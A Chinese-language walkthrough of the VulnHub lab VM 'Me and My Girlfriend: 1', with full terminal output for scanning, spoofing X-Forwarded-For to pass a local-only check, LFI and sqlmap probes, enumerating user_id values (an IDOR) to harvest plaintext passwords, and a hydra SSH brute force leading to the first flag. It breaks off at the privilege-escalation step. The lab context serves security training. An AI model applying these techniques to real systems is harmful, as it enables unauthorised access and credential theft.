Me and Mygirlfriend
作者:jason huawen
靶机信息
名称: Me and My Girlfriend: 1
地址:- https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
复制代码 识别目标主机IP地址
- ─(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
-
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
- 192.168.56.100 08:00:27:61:8a:f1 1 60 PCS Systemtechnik GmbH
- 192.168.56.254 08:00:27:87:26:b3 1 60 PCS Systemtechnik GmbH
复制代码 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
- ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
- Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
- Nmap scan report for www.armour.local (192.168.56.254)
- Host is up (0.000071s latency).
- Not shown: 65533 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 1024 57e15658460433563dc34ba793ee2316 (DSA)
- | 2048 3b264de4a03bf875d96e1555828c7197 (RSA)
- | 256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
- |_ 256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
- 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
- |_http-title: Site doesn't have a title (text/html).
- |_http-server-header: Apache/2.4.7 (Ubuntu)
- MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
-
复制代码 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
- ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ curl http://192.168.56.254
- Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
复制代码 站点只能从本地访问,而且提示是在请求头中设置x-forwarded-for
可以用burpsuite拦截请求,然后增加x-forwarded-for:127.0.0.1- ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ curl http://192.168.56.254/robots.txt
- User-Agent: *
- Allow: /heyhoo.txt
复制代码- ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ curl http://192.168.56.254/heyhoo.txt
- Great! What you need now is reconn, attack and got the shell
复制代码
<img alt="" loading="lazy">
此时成功得到页面:
<img alt="" loading="lazy">
不过用Burpsuite每次修改请求比较麻烦,可以用浏览器的插件IP,伪装X-Forwarded-For字段
从URL来看,是否会存在本地文件包含漏洞?- http://192.168.56.254/index.php?page=login
复制代码 但经过测试,没有得到任何返回,不过也没有报错
用PHP filter也没有成功- http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index
复制代码 用burpsuite拦截请求,并将请求存储为文件,然后用sqlmap扫描,看是否存在SQL注入漏洞?- (kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ sqlmap -r req.txt --level=5
复制代码 SQLMAP并没有发现出SQL注入漏洞。
接下来注册一个用户test,看有什么发现?以test用户登录后
<img alt="" loading="lazy">
注意这里的URL:- http://192.168.56.254/index.php?page=dashboard&user_id=14
复制代码 我们看是否可以通过修改user_id值进行水平攻击
当修改user_id=1时,查看profile
<img alt="" loading="lazy">
注意此时查看页面源代码,竟然有用户的明文密码:- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8">
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <meta http-equiv="X-UA-Compatible" content="ie=edge">
- <title>Ceban Corp</title>
-
- </head>
- <body>
-
- <h2>Welcome To Ceban Corp</h2>
- <p>Inspiring The People To Great Again!</p>
- <hr>
- <p><a target="_blank" href="https://www.cnblogs.com/?page=dashboard">Dashboard</a> | <a target="_blank" href="https://www.cnblogs.com/?page=profile&user_id=14">Profile</a> | <a target="_blank" href="https://www.cnblogs.com/?page=logout">Logout</a></p>
- <hr>
-
- <form action="#" method="POST">
- <label for="name">Name</label>
- <input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
- <label for="username">Username</label>
- <input type="text" name="username" id="username" value="eweuhtandingan"><br>
- <label for="password">Password</label>
- <input type="password" name="password" id="password" value="skuyatuh"><br>
- <button disabled="disabled">Change</button>
- </form>
- </body>
- </html>
复制代码 那该用户名和密码是否也是SSH的用户名和密码?但发现不成功,可以将所有的用户的用户名和密码都收集起来:(即依次将user_id枚举从1到没有返回内容为止)- ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ ssh eweuhtandingan@192.168.56.254
- The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
- ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
- This key is not known by any other names.
- Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
- Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
- eweuhtandingan@192.168.56.254's password:
- Permission denied, please try again.
- eweuhtandingan@192.168.56.254's password:
复制代码- ──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ cat users.dict
- eweuhtandingan
- aingmaung
- sundatea
- sedihaingmah
- alice
-
- ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ cat pass.dict
- skuyatuh
- qwerty!!!
- indONEsia
- cedihhihihi
- 4lic3
-
复制代码- ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254
- Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
- Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
- [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
- [DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
- [DATA] attacking ssh://192.168.56.254:22/
- [22][ssh] host: 192.168.56.254 login: alice password: 4lic3
- 1 of 1 target successfully completed, 1 valid password found
- [WARNING] Writing restore file because 2 final worker threads did not complete until end.
- [ERROR] 2 targets did not resolve or could not be connected
- [ERROR] 0 target did not complete
- Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20
复制代码- ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
- └─$ ssh alice@192.168.56.254
- alice@192.168.56.254's password:
- Last login: Fri Dec 13 14:48:25 2019
- alice@gfriEND:~$ id
- uid=1000(alice) gid=1001(alice) groups=1001(alice)
- alice@gfriEND:~$ ls -alh
- total 32K
- drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 .
- drwxr-xr-x 6 root root 4.0K Dec 13 2019 ..
- -rw------- 1 alice alice 10 Dec 13 2019 .bash_history
- -rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout
- -rw-r--r-- 1 alice alice 3.6K Dec 13 2019 .bashrc
- drwx------ 2 alice alice 4.0K Dec 13 2019 .cache
- drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .my_secret
- -rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile
- alice@gfriEND:~$ cat .bash_history
- exit
- exit
- alice@gfriEND:~$ cd .my_secret/
- alice@gfriEND:~/.my_secret$ ls -alh
- total 16K
- drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .
- drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 ..
- -rw-r--r-- 1 root root 306 Dec 13 2019 flag1.txt
- -rw-rw-r-- 1 alice alice 119 Dec 13 2019 my_notes.txt
- alice@gfriEND:~/.my_secret$ cat flag1.txt
- Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
- Now your last job is get access to the root and read the flag ^_^
- Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
- alice@gfriEND:~/.my_secret$ cat my_notes.txt
- Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
- alice@gfriEND:~/.my_secret$ cd /home
- alice@gfriEND:/home$ ls -alh
- total 24K
- drwxr-xr-x 6 root root 4.0K Dec 13 2019 .
- drwxr-xr-x 22 root root 4.0K Dec 13 2019 ..
- drwxr-xr-x 2 aingmaung aingmaung 4.0K Dec 13 2019 aingmaung
- drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 alice
- drwxr-xr-x 2 eweuhtandingan eweuhtandingan 4.0K Dec 13 2019 eweuhtandingan
- drwxr-xr-x 2 sundatea sundatea 4.0K Dec 13 2019 sundatea
复制代码 至此得到了第一Flag.
提权
[code]alice@gfriEND:/var/www/html$ cd configalice@gfriEND:/var/www/html/config$ ls -alhtotal 12Kdrwxrwxr-x 2 root root 4.0K Dec 13 2019 .drwxr-xr-x 5 root root 4.0K Dec 13 2019 ..-rw-rw-r-- 1 root root 88 Dec 13 2019 config.phpalice@gfriEND:/var/www/html/config$ cat config.php |